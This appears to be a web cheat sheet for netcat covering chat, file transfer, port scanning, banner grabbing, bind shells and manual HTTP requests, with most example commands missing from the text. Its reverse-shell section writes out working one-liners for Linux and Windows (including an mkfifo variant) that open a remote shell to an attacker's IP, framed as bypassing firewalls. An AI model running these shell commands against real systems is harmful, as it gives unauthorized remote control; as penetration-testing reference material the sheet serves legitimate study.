Ultimate Netcat Cheat Sheet
The “Swiss Army Knife” of TCP/IP networking.
1. Connection & Chat
The most basic usage: creating a simple client-server chat connection.
Server (Listener)
Run this on Machine A.
-l: Listen mode-v: Verbose (show info)-n: No DNS lookup (faster)-p: Local port
Client (Connector)
Run this on Machine B.
2. File Transfer
Transfer files between machines. Always start the Receiver first.
Receive File (Destination)
Listen and output content to a file.
Send File (Source)
Connect and push content into the pipe.
3. Port Scanning & Banners
Netcat can act as a simple port scanner when Nmap isn’t available.
TCP Scan
Scan ports 20 through 80. The -z flag means “Zero-I/O” (don’t send data, just scan).
UDP Scan
Add the -u flag for UDP ports.
Banner Grabbing
Connect to a port to see what version string the service sends back.
4. Reverse Shells (The “Hacker” Way)
Make the target connect back to you. Bypasses most inbound firewalls.
1. Setup Listener (Your Machine)
2. Execute Payload (Target Machine)
| OS | Command |
|---|---|
| Linux (Traditional) | nc -e /bin/bash [IP] 4444 |
| Windows | nc.exe -e cmd.exe [IP] 4444 |
| Linux (No -e flag) | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [IP] 4444 >/tmp/f |
-e flag for security. Use the “No -e flag” mkfifo method above.
5. Bind Shells
Open a port on the target and wait for a connection. (Blocked by most firewalls).
1. Setup Listener (Target Machine)
2. Connect (Your Machine)
6. Web Server Interaction
Manually talk to a web server to debug headers.
Manual HTTP Request
Then type:
(Press Enter twice)